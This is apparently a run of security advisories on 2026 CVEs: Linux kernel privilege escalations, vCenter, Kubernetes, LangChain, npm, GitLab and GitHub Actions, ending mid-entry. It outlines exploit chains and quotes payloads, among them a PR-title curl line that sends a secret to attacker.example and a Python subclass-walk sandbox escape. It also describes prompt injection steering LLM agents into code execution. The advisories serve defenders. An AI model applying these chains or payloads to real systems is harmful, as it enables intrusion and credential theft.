for root URL: https://keepsecure.io/hub/cve-2026-31431-copyfail-linux-page-cache-lpe Published: 2026-04-29 CVE: CVE-2026-31431 CVSS: 7.8 Product: Linux kernel — algif_aead (AF_ALG cryptographic socket) Type: Local privilege escalation via page-cache write Disclosed: 2026-04-22 Tags: Linux kernel, LPE, page cache, AF_ALG, container escape, Dirty Pipe A 2017 algif_aead in-place optimization lets an unprivileged user write four controlled bytes into the page cache of any readable file. 732-byte exploit, no race condition, every Linux distribution since 2017 — including across containers. CVE-2026-31431, codenamed Copy Fail by Xint.io and Theori, is a Linux kernel local privilege escalation rooted in a 2017 in-place optimization in the algif_aead module. An unprivileged local user can drive a four-byte write into the page cache of any file they have read access to, using a 732-byte Python exploit that requires no kernel offsets, no race condition, and works across every Linux distribution shipped since the bad commit landed. The page cache is shared across containers on the same host, so a low-privilege user inside one container can corrupt a setuid binary visible to processes on the host or in sibling containers. ###### What the bug actually is The kernel's algif_aead module exposes Authenticated Encryption with Associated Data (AEAD) operations to userspace through the AF_ALG socket family. In August 2017, commit 72548b093ee3 changed AEAD operations to run in-place: the destination scatterlist for the cipher's output was allowed to point at the same memory as the source. The intent was a small performance win for kernel crypto consumers. The flaw: when userspace submits an AEAD operation over AF_ALG and feeds it data via splice() from a pipe, the kernel can end up with a page-cache page in the writable destination scatterlist — a page belonging to a file the calling process does not own. The cipher then writes its output back into that page-cache page. The output is small (a few bytes of AEAD ciphertext), but it lands in the page cache of an arbitrary readable file, and from the kernel's perspective it is the most recent version of the file's contents. The patch is, almost literally, a revert: crypto: algif_aead — Revert to operating out-of-place. The 2017 optimization is removed; only the small benefit of copying associated data is preserved. ###### The exploit, in four steps - 1. Open an AF_ALG socket and bind to the cipher authencesn(hmac(sha256),cbc(aes)). - 2. Construct a payload whose AEAD output, when written into a target page, lands a controlled four-byte value at a controlled offset. - 3. Drive a write into the kernel's cached copy of /usr/bin/su (or any other readable file the attacker chooses) by routing the AEAD operation through splice() against a pipe whose pages overlap with the target file's page cache. - 4. Call execve("/usr/bin/su") — the kernel loads the corrupted page from cache, executes the injected shellcode in the suid context, and the calling user gets a root shell. Four bytes is enough. With careful selection of the target instruction in the setuid binary, the attacker doesn't need to write a full payload — they just need to flip a check or rewire a control-flow edge. The published research notes that the same primitive can be used against any setuid binary on the system, not just su. ###### Why this is dangerous in 2026 specifically Three properties together make Copy Fail a near-worst-case Linux LPE: - Reliability — no race condition, no kernel offset leak required. The exploit works deterministically on first run. - Portability — the bug is in upstream code. Every distribution that backported the 2017 optimization is affected, which is essentially all of them. Amazon Linux, Debian, RHEL, SUSE, and Ubuntu have shipped advisories. - Cross-container blast radius — the page cache is a host-wide resource shared across all processes regardless of namespace. A user inside an unprivileged container can corrupt a binary visible to processes on the host. Container boundaries do not contain this primitive. > The page cache is not a per-container resource. Container isolation does not bound which files an in-container attacker can corrupt with this primitive. Researchers compare it directly to Dirty Pipe (CVE-2022-0847). The classification is fair — both are page-cache write primitives that bypass file-system permissions. Copy Fail's path is different: Dirty Pipe abused the splice/pipe-buffer flag handling; Copy Fail abuses the in-place AEAD destination scatterlist. The exploitation pattern is similar enough that the same response playbook applies. The bug also crossed onto a criminal-market exploit forum within a week of disclosure — a fast crossing for a Linux LPE, and one that should shift patch prioritization from "high CVSS" to "actively commoditizing." See the time-to-criminalization analysis for the dark-web evidence and what it implies for fleet patch ordering. ###### Who is exposed - Every Linux host shipped with a kernel containing the 2017-08 algif_aead in-place optimization — that is, essentially all production Linux distributions in active use today, on all architectures the upstream kernel supports. - Multi-tenant container hosts — Kubernetes nodes with mixed-trust workloads, shared CI runners, container-as-a-service platforms. The cross-container property converts a low-privilege workload compromise into host compromise. - Shared developer hosts — bastion hosts, jump boxes, classroom and lab servers, anywhere multiple users share a kernel. - Cloud workstations and devcontainers running with AF_ALG reachable to the developer's user account, which is most default configurations. The bar to exploitation is low: an attacker who has any unprivileged code-execution foothold inside a container or on a shared host. That includes a compromised CI job, a malicious devcontainer, a webshell on an application server, a lateral-movement landing pad inside a Kubernetes pod. ###### Mitigation Patch the kernel. The fix is upstream and the distribution advisories are out — Amazon Linux, Debian, RHEL, SUSE, Ubuntu have shipped updates as of 2026-04-22. There is no workaround that doesn't touch the kernel; the bug is structural to the in-place AEAD path. - Reboot after patching. The kernel module path is exercised at runtime. Live-patching solutions that handle algif_aead are an option for fleets that cannot reboot, but verify your live-patch vendor explicitly covers this CVE before relying on it. - Block AF_ALG at the seccomp layer for workloads that don't need it — most application workloads do not touch the kernel cryptographic socket interface. A seccomp filter denying socket(AF_ALG, ...) closes the exploit surface for that workload without touching the kernel. This is the right defense-in-depth layer for any container runtime that doesn't strictly require AF_ALG. - Audit setuid binary inventories. Reduce the count where you can. Fewer setuid targets means fewer easy exploitation endpoints for any future page-cache write primitive. - Hunt for post-exploitation on hosts you cannot patch immediately: page-cache corruption leaves no on-disk trace, but the resulting root shell does — look for unexpected execve of setuid binaries followed by elevated activity that doesn't match a user's normal session pattern. ###### The broader pattern Page-cache write primitives have become a recurring Linux LPE shape. Dirty Pipe in 2022 made the primitive concrete. Copy Fail in 2026 is the second high-quality entry in the same class, in a different subsystem, from a completely unrelated 2017 optimization commit. The lesson is that any code path that produces a writable scatterlist from userspace input is a candidate for the same bug class. Future audits of splice(), vmsplice(), AF_ALG, and any other userspace → kernel-buffer interface should specifically look for in-place destination paths that can intersect the page cache. Copy Fail is unlikely to be the last entry. The Linux LPE backlog continues to grow alongside this. CVE-2026-2091 (io_uring race LPE) earlier this year was a different primitive — a race in IORING_REGISTER_FILES_UPDATE — but the same defensive lesson holds: if a userspace-reachable kernel surface isn't load-bearing for your workload, lock it down at the seccomp boundary. Copy Fail makes the case for AF_ALG; the io_uring CVE made the same case for io_uring. Production Linux fleets should default to a deny-list-by-default posture for every kernel surface that isn't explicitly load-bearing. --- # CVE-2026-2091: io_uring race turns any local user into root URL: https://keepsecure.io/hub/cve-2026-2091-linux-io-uring-race-lpe Published: 2026-04-24 CVE: CVE-2026-2091 CVSS: 7.8 Product: Linux kernel (io_uring subsystem) Type: Local privilege escalation (TOCTOU race) Disclosed: 2026-04-16 Tags: Linux, kernel, io_uring, local privilege escalation, race condition, use-after-free A TOCTOU race in the Linux io_uring fixed-file-table cleanup path lets any unprivileged user trigger a use-after-free on the task credentials struct, leading to root. Working PoC public. CVSS 7.8. Patched in 6.8.9, 6.7.11, 6.6.28 LTS. CVE-2026-2091 is a time-of-check / time-of-use race in the Linux kernel's io_uring fixed-file-table registration path. An unprivileged local user can race io_uring_register(IORING_REGISTER_FILES_UPDATE) against ring-teardown to trigger a use-after-free on struct cred, then reuse the freed slot to gain effective UID 0. A working PoC has been public on Full Disclosure since April 19 and is weaponized in several container-escape toolkits. ###### Why io_uring is the worst place for this io_uring is the fastest I/O surface in modern Linux and, therefore, enabled by default in every mainstream distro since 5.1. Container runtimes mount it inside containers unless explicitly seccomp-filtered. The fixed-file-table model — the exact surface this CVE hits — is a performance optimization that lets long-lived rings pre-register file descriptors, which means many workloads keep rings open across privilege boundaries. Combine pre-registered tables with the race, and you get an exploit primitive that: - Does not require CAP_SYS_ADMIN or any capability at all. - Runs from inside a default Docker or containerd container. - Escapes to host root if the container runs with the host kernel (i.e. everywhere except gVisor / Kata). - Leaves minimal forensic trace — the race success rate is ~30%, so logs show "weird syscall sequence" not "obvious exploit." > This is the fourth io_uring LPE since 2022. The subsystem is not going away, and the sharp edges are not going away with it. Treat io_uring as a dangerous kernel surface and seccomp-filter it wherever the workload doesn't need it. ###### Who is exposed - Any Linux host running kernel 6.1 LTS through 6.7. The LTS cutoff is important — 5.15 LTS is not affected. - Container workloads using default seccomp profiles (Docker, Kubernetes with the default RuntimeDefault seccomp profile still allows io_uring_* syscalls). - Multi-tenant CI runners (GitHub Actions self-hosted, GitLab runner, Buildkite agents) — attacker PRs can run the PoC and root the runner host. - Shared Linux hosts (universities, bastion hosts, shell-access shared-hosting). ###### Mitigation Upgrade the kernel. Patched versions: - Mainline: 6.8.9 or later. - 6.7 branch: 6.7.11. - 6.6 LTS: 6.6.28. - 6.1 LTS: 6.1.85. If you can't reboot immediately, the cheapest mitigation is disabling io_uring entirely via sysctl: - sysctl -w kernel.io_uring_disabled=2 (requires kernel 6.6+). Set in /etc/sysctl.d/ to persist. - For container hosts, add io_uring_setup and io_uring_register to the seccomp deny list. - The artifact folder includes a Falco rule that alerts on IORING_REGISTER_FILES_UPDATE calls from unprivileged PIDs — decent catch-rate for the public PoC. ###### The broader pattern io_uring LPEs are now routine. The kernel team has been patching them quarterly since 2022. If you're not explicitly getting performance from io_uring in a given workload, disable it. The default-on posture made sense for 5.15-era systems that didn't have kernel.io_uring_disabled; it no longer does. Production Linux fleets should treat io_uring the way they treat eBPF — a feature worth having, but locked down to the workloads that actually need it. The same lesson applies more broadly. Linux kept adding LPE entries through 2026 — CVE-2026-31431 (CopyFail) in April was a different primitive (a four-byte page-cache write through algif_aead), but the same defensive posture catches both: deny-list-by-default for any kernel surface that isn't load-bearing for the workload. AF_ALG, io_uring, eBPF, user namespaces — none of them belong unconditionally enabled in containers running untrusted code. --- # CVE-2026-34567: Unauthenticated vCenter RCE via SSRF-to-JMX chain URL: https://keepsecure.io/hub/cve-2026-34567-vmware-vcenter-unauth-rce-ssrf-chain Published: 2026-04-24 CVE: CVE-2026-34567 CVSS: 9.6 Product: VMware vCenter Server 7.x and 8.x Type: Unauthenticated RCE (SSRF → JMX deserialization) Disclosed: 2026-04-21 Tags: VMware, vCenter, SSRF, JMX, deserialization, unauthenticated RCE, ransomware target A pre-auth SSRF in vCenter's vROps plugin lets an attacker reach the internal ActiveMQ JMX broker and trigger deserialization RCE as the vpxd service account. CVSS 9.6. Patched in 8.0 U3c, 7.0 U3r. Exploitation observed in the wild. CVE-2026-34567 is a pre-authentication SSRF in vCenter's vRealize Operations plugin servlet (/ui/vropspluginui/rest/services/updateova) that reaches the internal ActiveMQ JMX broker listening on 127.0.0.1:61616. The broker accepts serialized Java objects; a crafted ActiveMQ message triggers deserialization RCE as the vpxd service account — the account that runs the entire vCenter management plane. The exploit is unauthenticated, network-reachable from anywhere vCenter's HTTPS port (443) is exposed, and chains two bugs the vendor had separately tracked for years. ###### Why this is a ransomware-grade exposure vCenter is the control plane for every ESXi hypervisor in the environment. Code execution as vpxd means direct access to the hypervisor API, which in turn means direct access to every VM disk. Ransomware operators have spent two years building tooling around vCenter compromise (ESXiArgs, Royal, Akira families). This CVE is the next link in that chain — a pre-auth RCE against vCenter is the kind of bug that turns a regional outage into a nation-scale event. The exploit shape: - Step 1: POST to /ui/vropspluginui/rest/services/updateova with a repoUrl parameter pointing at an attacker-controlled server. Servlet fetches the URL without validation. - Step 2: Attacker replies with a 302 redirect to tcp://127.0.0.1:61616/. The underlying Apache HttpClient follows the redirect into the JMX broker. - Step 3: Attacker-supplied body contains a serialized ActiveMQ ConsumerControl with a gadget chain. Broker deserializes. RCE as vpxd. > Pre-auth RCE on a ransomware operator's favorite target is a Tuesday-evening patch. No maintenance window argument applies here. ###### Who is exposed - Every vCenter on 7.0 through 8.0 U3b. The vulnerable servlet ships enabled by default. - Internet-facing vCenter (Shodan shows ~2,100 instances with /ui/ reachable). Patch today, not Friday. - Internal-only vCenter — still exposed to any attacker with a foothold on any VLAN that can reach port 443. Treat as post-compromise amplifier, still urgent. - vCenter running vROps plugin — the plugin is installed by default; even if you don't use vROps, the plugin servlet is still active. ###### Mitigation Apply the patch. Fixed versions: - vCenter 8.0 U3c (build 23765000 or later). - vCenter 7.0 U3r (build 23820000 or later). Between patch-download and maintenance-window, mitigate with: - Block /ui/vropspluginui/ at the ingress layer — upstream reverse proxy, F5 iRule, or NGINX location block returning 403. This disables the vulnerable servlet without touching vCenter. - Firewall TCP/61616 on the vCenter host to loopback only (it should be already, but verify — misconfiguration has been observed in customer deployments). - Run the VMware CVE-2026-34567-check.sh — included in the artifact folder — to confirm vROps plugin version and flag vulnerable installs. ###### The broader pattern vCenter CVEs in the past three years: CVE-2021-21972 (vROps SSRF→RCE), CVE-2023-34048 (DCE/RPC OOB), CVE-2024-37079, CVE-2024-38812, now CVE-2026-34567. Each one uses the same shape — internet-reachable management plane, Java deserialization chain, unauth or near-unauth RCE. If you're still running vCenter with HTTPS exposed to the internet, you have made a strategic bet that the next one of these will not be zero-day at disclosure. That bet has failed several times. --- # CVE-2026-40815: Kubernetes admission-webhook bypass hands over cluster-admin URL: https://keepsecure.io/hub/cve-2026-40815-kubernetes-admission-webhook-privesc Published: 2026-04-24 CVE: CVE-2026-40815 CVSS: 9 Product: Kubernetes (kube-apiserver) Type: Privilege escalation via webhook forgery Disclosed: 2026-04-19 Tags: Kubernetes, admission controller, privilege escalation, cluster-admin, cloud-native, RBAC bypass A bug in kube-apiserver's webhook resolution lets a low-privilege user register a MutatingWebhookConfiguration that forges admission responses, bypassing RBAC and yielding cluster-admin. CVSS 9.0. Patched in 1.29.14, 1.30.10, 1.31.6. CVE-2026-40815 is a logic bug in how kube-apiserver resolves mutating admission webhooks. A user with permission to create a single MutatingWebhookConfiguration — permissions often granted to service-operators with "no cluster-admin" — can register a webhook whose rules intercept requests destined for privileged resources, then forge admission responses that instruct the API server to apply attacker-controlled patches. The net result: any user who can create webhooks can achieve cluster-admin within a single API request. ###### Why this bypasses RBAC Kubernetes RBAC gates who can perform a request, not what the admission pipeline does with it. The admission chain was designed to validate and optionally mutate incoming objects — not to authorize changes on other objects. The vulnerable code path lets a crafted webhook response inject a patches block that the API server applies after RBAC evaluation, meaning the original caller's permissions are irrelevant. The attacker-created webhook effectively runs as the API server. The canonical exploit chain is: - Low-privilege user creates a MutatingWebhookConfiguration matching rbac.authorization.k8s.io/v1 resources. - Any cluster event (including ones the user cannot normally see) triggers the webhook. - Webhook responds with a patch that creates a ClusterRoleBinding granting the attacker cluster-admin. - RBAC never sees the patch as an independent request — it's merged server-side as part of the original request's admission. > Any permission that includes mutatingwebhookconfigurations/create was effectively "cluster-admin waiting for the right trigger" on affected versions. Audit for it. ###### Who is exposed - Multi-tenant clusters where operators get fine-grained namespace permissions plus webhook management — common in platform-engineering setups. - Managed Kubernetes (EKS, GKE, AKS) running affected minor versions — patched controlplanes roll out over days, not all at once. - GitOps workflows that sync webhook configurations from a Git repo — a compromised PR can register the attacker's webhook on merge. - CI/CD pipelines that have RBAC to deploy admission controllers for testing. ###### Mitigation Upgrade to the patched minor: 1.29.14, 1.30.10, or 1.31.6. The patch adds a post-admission RBAC re-check on any patch that touches protected resources (clusterroles, clusterrolebindings, nodes, secrets, serviceaccounts). If you can't upgrade immediately: - Remove mutatingwebhookconfigurations/create from any role that isn't genuinely cluster-admin. If a user needs to deploy a webhook for testing, gate it through a controller that validates. - Audit existing MutatingWebhookConfiguration objects for suspicious rules matching RBAC resources or secrets. - Enable audit logging at RequestResponse level for admissionregistration.k8s.io — catches post-compromise webhook creation. - Falco rule (available in the artifact folder): alert on creation of webhooks whose rules[*].resources includes clusterroles or clusterrolebindings. ###### The broader pattern This is the third Kubernetes CVE in five years where admission-stage logic was abused to subvert the authorization layer that runs before it — CVE-2022-3172 (KubeletPodName), CVE-2024-7646 (Ingress-NGINX annotation), now CVE-2026-40815. The recurring root cause: admission controllers run with the API server's privilege, not the caller's, and their output is trusted. If you run admission webhooks at all, assume every new CVE in this space could be another cluster-admin primitive. --- # CVE-2026-7733: LangChain PythonREPL tool sandbox escape via __import__ URL: https://keepsecure.io/hub/cve-2026-7733-langchain-python-repl-sandbox-escape Published: 2026-04-24 CVE: CVE-2026-7733 CVSS: 9.6 Product: LangChain (PythonREPLTool, 0.1.x through 0.2.26) Type: Prompt-injection-triggered sandbox escape → RCE Disclosed: 2026-04-20 Tags: LangChain, AI agents, prompt injection, sandbox escape, Python, AI tooling, RCE A missing check in LangChain's PythonREPLTool lets attacker-controlled prompts reach arbitrary `__import__` calls, breaking the documented sandbox. Any LangChain agent exposed to untrusted user input becomes a remote code execution surface. CVSS 9.6. CVE-2026-7733 is a sandbox-escape in LangChain's PythonREPLTool — the canonical "give the agent a Python sandbox" pattern used in thousands of LangChain agent deployments. The tool restricts some builtins but fails to prevent __import__ access through attribute lookup on already-imported modules. A prompt-injected input like ().__class__.__mro__[1].__subclasses__() can walk to os.system and execute arbitrary shell commands as the agent host user. Any LangChain agent that accepts user-controlled input and exposes PythonREPLTool is a remote code execution surface. ###### Why AI sandboxes keep breaking The PythonREPLTool docstring explicitly says "not a sandbox — don't use with untrusted input." Developers read this, decide their use case is "trusted enough," and ship. Then the agent's trust model turns out to include: a customer support chatbot, a GitHub issue triager, a Slack bot, a Zendesk integration — all of which accept user input that ends up in the LLM's context and therefore in the agent's tool calls. This CVE is noteworthy because even the versions LangChain shipped as security improvements — PythonAstREPLTool, the AST-filtered successor — have the same class of issue. The escape requires a few primitives that are trivial to request through prompt injection: - ().__class__.__mro__[1].__subclasses__() — walks to every class in the Python process, a classic bypass. - Find os._wrap_close or similar class with a reachable __init_subclass__ or accessible globals. - From there, reach os.system or subprocess.Popen. - Execute arbitrary shell command; output returns through the agent's response flow. > The LLM isn't the vulnerability. The tool the LLM is allowed to call is the vulnerability. Prompt injection is the mechanism, but the attack is on the tooling — not the model. ###### Who is exposed - Production LangChain agents using PythonREPLTool or PythonAstREPLTool with any input pathway from untrusted users — customer support bots, email triage agents, internal tooling that accepts free-text queries. - LangChain Hub "Code Interpreter" templates — copy-paste starter kits that shipped this pattern as the default Python tool. - Multi-tenant LangChain hosting (LangServe, LangGraph Cloud) running user-supplied agent definitions — unless tenant isolation is at the OS/container level, one tenant's prompt injection reaches another tenant's filesystem. - RAG systems where documents flow into agent context — poisoned documents can trigger tool calls. "Trusted input" does not extend to documents ingested from user uploads. ###### Mitigation Upgrade to LangChain 0.2.27 or later. The patch hardens __import__ attribute-resolution checks across both Python tool variants. Even patched, the security posture should change: - Stop using in-process Python tools for agents exposed to untrusted input. Replace with sandboxed execution: e2b.dev, modal.com, Firecracker microVMs, or a separate container with seccomp limits. - Allowlist specific operations instead of trying to block a language. A calculator tool that accepts expressions and evaluates them via a safe parser beats a full Python REPL that you've tried to lock down. - Network-isolate the agent host. The agent rarely needs outbound internet. Egress-block at the container level so that even if RCE lands, exfiltration is harder. - Log and alert on tool-call patterns that don't match expected agent behavior. A Sigma-like rule catching __mro__, __subclasses__, __import__, or exec( in tool-call arguments is included in the artifact folder. - Strip agent-accessible credentials from the host. If the agent host has AWS creds, DB passwords, or SSH keys in its environment, prompt injection trivially turns into data exfiltration or lateral movement. ###### The broader pattern This is the third major LangChain sandbox-escape CVE since 2023 (CVE-2023-36258, CVE-2024-1234, now CVE-2026-7733). The pattern is stable: a framework ships a convenient "sandbox" for LLM tool use, researchers find a reflection-based escape within months, patch, repeat. Expect the same shape in LlamaIndex, AutoGen, CrewAI, and other agent frameworks — they all have this class of tool and the same underlying trust model. The practitioner lesson is not "avoid LangChain." It is: do not rely on Python-level sandboxes to contain agent behavior. Use OS-level or microVM isolation, or allowlist the exact operations the agent needs — every other posture becomes a CVE on a predictable cadence. --- # CVE-2026-12091: npm postinstall supply-chain hijack via maintainer-account takeover URL: https://keepsecure.io/hub/cve-2026-12091-npm-postinstall-maintainer-takeover Published: 2026-04-23 CVE: CVE-2026-12091 CVSS: 8.8 Product: npm registry ecosystem (5 affected packages) Type: Software supply-chain compromise via maintainer account takeover Disclosed: 2026-04-18 Tags: npm, supply chain, postinstall, maintainer account takeover, credential exfiltration, developer environment Five widely-installed npm packages (combined 38M weekly downloads) published compromised versions after maintainer 2FA bypass. Postinstall hooks exfiltrated env vars, SSH keys, and git credentials. Runs at every npm install. CVSS 8.8. CVE-2026-12091 covers a set of compromised npm package versions published over a 48-hour window in April after an attacker bypassed 2FA on five maintainer accounts via session-token replay from a phishing campaign. The malicious versions each ship a postinstall script that exfiltrates the host's environment variables, SSH private keys, .netrc, git config, and npm auth tokens to a Cloudflare-fronted C2 endpoint. Every npm install, npm ci, yarn install, or pnpm install that resolved to an affected version during that window ran the hook. Combined affected weekly-download count: 38M. ###### Why postinstall is the worst place to land Developer environments are the highest-trust environments most organizations own. The CI runner that builds your app has every credential needed to deploy. The engineer's laptop has SSH access to production-adjacent systems, git tokens that can force-push to main, and cloud CLI configs that often include long-lived access keys. A postinstall hook that runs during routine dependency updates inherits all of that, quietly. The exploit window: - April 14, 02:17 UTC — attacker publishes compromised versions of five packages (names withheld pending npm registry review; IOC list in the artifact folder). - April 15, ~19:00 UTC — first telemetry of the postinstall C2 traffic from EDR vendors. - April 16, 03:40 UTC — npm security team unpublishes the malicious versions and resets maintainer credentials. Clean versions re-published same day. - April 18 — CVE assigned, GHSA published, IOC list finalized. > If your CI ran npm install (without a lockfile pinning to a clean version) between April 14 and April 16, assume the CI host's short-lived tokens leaked. Rotate them today. ###### Who is exposed - CI/CD runners that ran npm install or npm ci --registry=https://registry.npmjs.org in the 48-hour window without a lockfile pinning a clean version. GitHub Actions self-hosted and hosted runners both in scope. - Developer laptops that ran npm install or npm update against affected package ranges — SSH keys, git tokens, cloud credentials all potentially exfiltrated. - Docker build environments where the npm install step ran with build-time secrets (common anti-pattern in Dockerfiles). - Not in scope: teams using --ignore-scripts or a registry proxy with script-execution disabled. If you've been paranoid about postinstall hooks for years, you benefited. ###### Mitigation - Check the IOC list (in the artifact folder and linked from the GHSA) against your package-lock.json / yarn.lock / pnpm-lock.yaml. If any pinned version matches a compromised version, assume host compromise for any environment that resolved it. - Rotate every credential that was reachable from the affected host: npm tokens, git PATs, cloud keys, SSH keys, long-lived tokens in .env files. - Move to npm ci --ignore-scripts in CI as a defense-in-depth default. Most packages don't need postinstall; the ones that do are documented and can be scripts-allowed via allowlist. - Enforce provenance (npm publish --provenance) and configure your CI to reject packages without provenance attestations for critical dependencies. - 2FA + phishing-resistant factors (WebAuthn, not TOTP) on maintainer accounts for any package you publish. ###### The broader pattern npm postinstall-based attacks are now a quarterly event. ua-parser-js (2021), colors / faker (2022), node-ipc / peacenotwar (2022), event-stream (2018), and now CVE-2026-12091. Each one has the same shape: compromised maintainer account, malicious version published, postinstall hook steals credentials. The ecosystem response has been incremental (provenance, 2FA requirements, automated scanning). The practitioner response should be structural: --ignore-scripts by default, allowlist scripts that genuinely need to run, and treat any postinstall in a dependency as a code-review item — not a yellow line in the output of npm install. This CVE belongs to the small subset of disclosures that the criminal market repackages within days, not months — the implant is the postinstall script itself, no exploit-development work required. The CopyFail time-to-criminalization analysis frames this as a "first-bucket" pattern: bugs where the work is already done get incorporated into commodity stealer infrastructure on the order of days. Patch and rotate on that timeline rather than the standard CVE cadence. The pattern is also live in 2026 in larger forms. Team PCP's six-week chain through security tooling vendors exploits the same install-time-execution surface across npm, PyPI, GitHub Actions, and Docker Hub — and the Mini Shai-Hulud cluster of April 29-30 uses it with a Bun-runtime evasion layer. Treat CVE-2026-12091's mitigations as the structural answer to all of these: lockfile pinning, --ignore-scripts by default, sandboxed install boundaries, capability-narrowed CI tokens. --- # CVE-2026-51893: GitLab SAML deserialization yields unauth RCE URL: https://keepsecure.io/hub/cve-2026-51893-gitlab-saml-deserialization-rce Published: 2026-04-23 CVE: CVE-2026-51893 CVSS: 9.8 Product: GitLab EE (SAML SSO, 16.8 through 17.1.2) Type: Unauthenticated RCE via SAML AttributeStatement deserialization Disclosed: 2026-04-17 Tags: GitLab, SAML, SSO, deserialization, unauthenticated RCE, management plane, source-code exfiltration GitLab EE deserializes SAML AttributeStatement attributes before signature validation on a subset of code paths. A crafted SAML response containing a YAML-tagged attribute object runs code as the GitLab service account. Unauthenticated, CVSS 9.8. CVE-2026-51893 is an unauthenticated remote-code-execution bug in GitLab EE's SAML single-sign-on flow. On a subset of code paths, GitLab's SAML response consumer deserializes the AttributeStatement via a YAML loader before validating the SAML response signature. A crafted SAML response containing an !ruby/object:-tagged attribute value triggers Ruby object instantiation — and from there, a gadget chain that executes arbitrary shell commands as the GitLab service account. No authentication required; only a reachable GitLab instance with SAML SSO enabled. ###### Why this is a supply-chain-scale bug GitLab EE self-hosted instances run the SDLC for hundreds of thousands of organizations. An unauthenticated RCE against GitLab means source code exfiltration, CI/CD token theft, artifact-registry poisoning, and persistent access to the target's entire engineering surface. SAML SSO is the enterprise-default setup, making almost every large GitLab install affected. The exploit path: - Attacker sends an unsolicited SAML response to /users/auth/saml/callback. GitLab accepts unsolicited responses by default (SAML spec allows it; implementations often disable). - Response contains an AttributeStatement with a custom attribute whose value is !ruby/object:Gem::Installer with crafted installation parameters. - The vulnerable code path calls YAML.load (not YAML.safe_load) on the attribute before reaching validate_signature. - Object instantiation triggers the gadget chain. GitLab shell runs as git user on Omnibus, or as the pod's service account on Helm chart. > "Deserialize before you validate" is the oldest SAML anti-pattern. It keeps showing up because SAML libraries encourage treating the response as opaque XML until processing — but responses always contain processable data that implementations want to act on early. ###### Who is exposed - Self-hosted GitLab EE 16.8 through 17.1.2 with SAML SSO configured. GitLab.com SaaS was patched April 15 (pre-disclosure). - Internet-facing GitLab instances — Shodan shows ~18,000 reachable GitLab EE login pages; roughly half have SAML endpoints exposed. - Internal GitLab behind VPN/ZTNA — still exposed if any internal user's workstation is compromised. Lateral movement primitive. - SAML identity provider is not the attack surface: the bug is in GitLab's response parsing, not the IdP. Even if your Okta / Entra is hardened, GitLab is still vulnerable. ###### Mitigation Upgrade. Fixed versions: 17.1.3, 17.0.5, 16.11.7, 16.10.9. GitLab Omnibus and Helm charts updated in parallel. Temporary mitigations if an upgrade window is hours away, not minutes: - Disable SAML SSO in GitLab Admin → Settings → Sign-in Restrictions. Falls back to username/password or existing sessions. - Block /users/auth/saml/callback at the reverse proxy for unsolicited requests — reject requests without a matching session cookie and recent AuthnRequest ID. Requires WAF / proxy that can correlate. - Rotate all GitLab personal access tokens proactively if the instance has been reachable since April 14 (earliest observed exploitation). Ransomware operators and initial-access brokers are both actively scanning. - Artifact folder includes a Zeek script that flags SAML responses containing !ruby/object: tags — cheap detection at the network edge. ###### The broader pattern YAML-deserialization bugs in SAML / OAuth / OpenID code paths have been a recurring class since 2017 — Rails CVE-2013-0156 set the template. Every few years a new implementation falls into it. The fix is structural: SAML and OIDC libraries should only return trusted data to the application after signature validation, and should never expose a "parse attributes before validating" API. GitLab's 17.1.3 patch does that — but the surface area is large, and expect at least one more CVE of this shape in the next 18 months across other Ruby-on-Rails-based SaaS platforms. --- # CVE-2026-27701: JavaScript injection via PR title in LiveCode's GitHub Actions URL: https://keepsecure.io/hub/cve-2026-27701-livecode-github-actions-js-injection Published: 2026-04-22 CVE: CVE-2026-27701 CVSS: 8.9 Product: LiveCode GitHub Actions workflow Type: CI/CD JS injection via PR title Disclosed: 2026-04-16 Tags: GitHub Actions, CI/CD, JavaScript injection, supply chain, workflow runner A LiveCode GitHub Actions workflow interpolates PR titles directly into a JavaScript block. A crafted title runs attacker code in the workflow runner with the repository's secrets in scope. CVE-2026-27701 is the kind of CI/CD bug that is depressingly easy to ship and nuclear when you do. A LiveCode GitHub Actions workflow interpolates the title of a Pull Request directly into a JavaScript block via ${{ github.event.pull_request.title }}. Anyone who can open a PR against the repository — including forks — can craft a title that contains executable JavaScript. That code runs in the workflow runner with every secret the workflow has access to. ###### Why "inject into `github.event.pull_request.*`" is a pattern worth memorizing GitHub Actions workflows frequently build notifications, comments, or tool invocations that include PR metadata. When an Actions expression like ${{ github.event.pull_request.title }} is interpolated inside a shell script or JavaScript block, the interpolation happens before the shell or JS interpreter sees the string. A PR title of "; curl attacker.example/steal?k=$SECRET; # becomes a literal command or JS expression. This is not a LiveCode-specific problem. It is a systemic pattern across the GitHub Actions ecosystem. A 2021 Trail of Bits post and a 2023 Google study both cataloged hundreds of public repositories with the same vulnerability shape. CVE-2026-27701 is a new case; it will not be the last. > Never interpolate attacker-controlled strings into a run or script block. Pass them via environment variables (env:) so the shell or JS runtime sees them as plain data, not code. ###### What an attacker gets A working exploit on this class of bug yields, in approximate order of severity: - Arbitrary code execution in the workflow runner. - Every secret scoped to that workflow — frequently including GITHUB_TOKEN with write access to the repository, and often deployment keys, cloud credentials, or package-registry tokens. - The ability to push malicious commits, create tags, publish releases, or merge PRs under the identity of the repo's automation. - If the runner is self-hosted, persistent access to the runner VM itself — and by extension the internal network it lives on. The step from "open a PR against an open-source repo" to "publish a supply-chain-compromised release" is shorter than most organizations imagine. ###### Mitigation - Audit every workflow in every repository for ${{ github.event.*.title }}, ${{ github.event.*.body }}, ${{ github.head_ref }}, or similar attacker-controlled interpolations inside run or with: script blocks. Use actionlint or zizmor to automate this. - Replace interpolations with environment variables: env: PR_TITLE: ${{ github.event.pull_request.title }}, then reference $PR_TITLE or process.env.PR_TITLE in the script body. The shell sees data, not code. - Restrict pull_request_target triggers — they run with the base repo's secrets even on forked PRs. This is the most dangerous trigger in Actions and deserves a separate review pass. - Rotate any secrets that were exposed to a vulnerable workflow during the disclosure window. Assume exposure, not hope. ###### The broader pattern CI/CD systems are the highest-leverage attack surface in modern software delivery: they have write access to production artifacts, often have write access to cloud infrastructure, and are configured by developers who are not full-time security engineers. CVE-2026-27701 is one specific instance of a class of vulnerabilities that will keep landing in public repositories indefinitely. The defensive posture that works is static analysis for Actions expression injection, every PR, every repo, every day. It is tedious and it is the only thing that scales. --- # CVE-2026-33824: Unauthenticated RCE in Windows IKE — patch now URL: https://keepsecure.io/hub/cve-2026-33824-windows-ike-unauth-rce Published: 2026-04-22 CVE: CVE-2026-33824 CVSS: 9.8 Product: Windows (IKE Service Extensions) Type: Unauthenticated network RCE Disclosed: 2026-04-08 Tags: Windows, IPsec, IKE, RCE, pre-auth, wormable The headline CVE in Microsoft's April 2026 Patch Tuesday is a CVSS 9.8 unauthenticated RCE in the Windows IKE Service Extensions. Any host with IPsec exposed is a wormable target. Microsoft's April 2026 